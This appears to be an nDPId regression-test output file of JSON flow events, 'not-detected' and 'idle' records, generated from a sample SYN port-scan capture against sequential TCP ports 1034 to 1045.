-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1036,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1037,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1036,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1037,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1039,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1039,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1044,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1044,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
